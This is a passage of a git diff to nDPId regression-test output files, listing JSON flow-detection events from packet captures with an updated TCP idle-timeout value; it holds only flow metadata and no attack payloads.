+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348073365,"flow_last_seen":1499348078919,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35682,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":648,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348074670,"flow_last_seen":1499348079919,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35696,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":648,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348074670,"flow_last_seen":1499348079919,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35696,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348077218,"flow_last_seen":1499348082920,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35722,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348077218,"flow_last_seen":1499348082920,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35722,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":650,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348078531,"flow_last_seen":1499348083921,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35736,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":650,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348078531,"flow_last_seen":1499348083921,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35736,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":651,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348081113,"flow_last_seen":1499348086921,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35762,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":651,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348081113,"flow_last_seen":1499348086921,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35762,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":652,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348082422,"flow_last_seen":1499348087922,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35776,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":652,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348082422,"flow_last_seen":1499348087922,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35776,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":653,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348083715,"flow_last_seen":1499348088922,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35790,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":653,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348083715,"flow_last_seen":1499348088922,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35790,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":654,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348086300,"flow_last_seen":1499348091923,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35816,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":654,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348086300,"flow_last_seen":1499348091923,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35816,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":655,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348087568,"flow_last_seen":1499348092924,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35830,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":655,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348087568,"flow_last_seen":1499348092924,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35830,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":656,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348090129,"flow_last_seen":1499348095924,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35856,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":656,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348090129,"flow_last_seen":1499348095924,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35856,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":657,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348091413,"flow_last_seen":1499348096924,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35870,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":657,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348091413,"flow_last_seen":1499348096924,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35870,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348092675,"flow_last_seen":1499348097925,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35884,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348092675,"flow_last_seen":1499348097925,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35884,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":659,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1499348095258,"flow_last_seen":1499348095259,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35910,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":659,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1499348095258,"flow_last_seen":1499348095259,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35910,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":660,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1499348096595,"flow_last_seen":1499348096595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35924,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":660,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1499348096595,"flow_last_seen":1499348096595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35924,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1499348099359,"flow_last_seen":1499348099360,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35950,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1499348099359,"flow_last_seen":1499348099360,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35950,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"finished","flow_packets_processed":311,"flow_first_seen":1499347939286,"flow_last_seen":1499348006339,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1870,"flow_tot_l4_payload_len":232672,"flow_avg_l4_payload_len":748,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34278,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00576{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","packets-captured":9374,"packets-processed":9374,"total-skipped-flows":0,"total-l4-data-len":4091888,"total-not-detected-flows":0,"total-guessed-flows":639,"total-detected-flows":22,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":661,"total-idle-flows":661,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":3970,"global_ts_msec":1499348099366} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 9374/9374 diff --git a/test/results/afp.pcap.out b/test/results/afp.pcap.out index bed31ae62..51c1ca3a7 100644 --- a/test/results/afp.pcap.out +++ b/test/results/afp.pcap.out 
@@ -1,11 +1,11 @@ 00454{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"afp.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00540{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"afp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1643275951277} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"afp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643275951277,"flow_last_seen":1643275951277,"flow_idle_time":7440000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1643275951277,"l3_proto":"ip4","src_ip":"192.168.27.57","dst_ip":"192.168.27.139","src_port":64987,"dst_port":548,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"afp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1643275951277,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1643275951277,"pkt":"ABxCVgfWYPgdrn1ECABFAABKAABAAEAGgpnAqBs5wKgbi\/3bAiR+nkVXU19RioAYCHEmJgAAAQEICtTtV\/gAQrf\/AAIixgAAAAAAAAAGAAAAABEAAAIOHA=="} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"afp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643275951277,"flow_last_seen":1643275951277,"flow_idle_time":7440000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1643275951277,"l3_proto":"ip4","src_ip":"192.168.27.57","dst_ip":"192.168.27.139","src_port":64987,"dst_port":548,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AFP","breed":"Acceptable","category":"DataTransfer"}} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"afp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1643275951277,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1643275951277,"pkt":"YPgdrn1EABxCVgfWCABFAAA038RAAEAGourAqBuLwKgbOQIk\/dtTX1GKfp5FbYAQVeK4OwAAAQEICgBCwzzU7Vf4"} 
-00531{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"afp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1643275951277,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":116,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":116,"pkt_l4_len":82,"thread_ts_msec":1643275951277,"pkt":"YPgdrn1EABxCVgfWCABFAABm38VAAEAGorfAqBuLwKgbOQIk\/dtTX1GKfp5FbYAYVeK4bQAAAQEICgBCwzzU7Vf4AQIixgAAAAAAAAAiAAAAAA4cx5MnnCmFIy+AAAAAAAAACVyxcAAAAAALpMeAAAAAEAA="} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"afp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1643275951277,"flow_last_seen":1643275952364,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":10,"midstream":1,"thread_ts_msec":1643275952364,"l3_proto":"ip4","src_ip":"192.168.27.57","dst_ip":"192.168.27.139","src_port":64987,"dst_port":548,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AFP","breed":"Acceptable","category":"DataTransfer"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"afp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643275951277,"flow_last_seen":1643275951277,"flow_idle_time":7560000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1643275951277,"l3_proto":"ip4","src_ip":"192.168.27.57","dst_ip":"192.168.27.139","src_port":64987,"dst_port":548,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"afp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1643275951277,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1643275951277,"pkt":"ABxCVgfWYPgdrn1ECABFAABKAABAAEAGgpnAqBs5wKgbi\/3bAiR+nkVXU19RioAYCHEmJgAAAQEICtTtV\/gAQrf\/AAIixgAAAAAAAAAGAAAAABEAAAIOHA=="} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"afp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643275951277,"flow_last_seen":1643275951277,"flow_idle_time":7560000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1643275951277,"l3_proto":"ip4","src_ip":"192.168.27.57","dst_ip":"192.168.27.139","src_port":64987,"dst_port":548,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AFP","breed":"Acceptable","category":"DataTransfer"}} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"afp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1643275951277,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1643275951277,"pkt":"YPgdrn1EABxCVgfWCABFAAA038RAAEAGourAqBuLwKgbOQIk\/dtTX1GKfp5FbYAQVeK4OwAAAQEICgBCwzzU7Vf4"} 
+00531{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"afp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1643275951277,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":116,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":116,"pkt_l4_len":82,"thread_ts_msec":1643275951277,"pkt":"YPgdrn1EABxCVgfWCABFAABm38VAAEAGorfAqBuLwKgbOQIk\/dtTX1GKfp5FbYAYVeK4bQAAAQEICgBCwzzU7Vf4AQIixgAAAAAAAAAiAAAAAA4cx5MnnCmFIy+AAAAAAAAACVyxcAAAAAALpMeAAAAAEAA="} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"afp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1643275951277,"flow_last_seen":1643275952364,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":10,"midstream":1,"thread_ts_msec":1643275952364,"l3_proto":"ip4","src_ip":"192.168.27.57","dst_ip":"192.168.27.139","src_port":64987,"dst_port":548,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 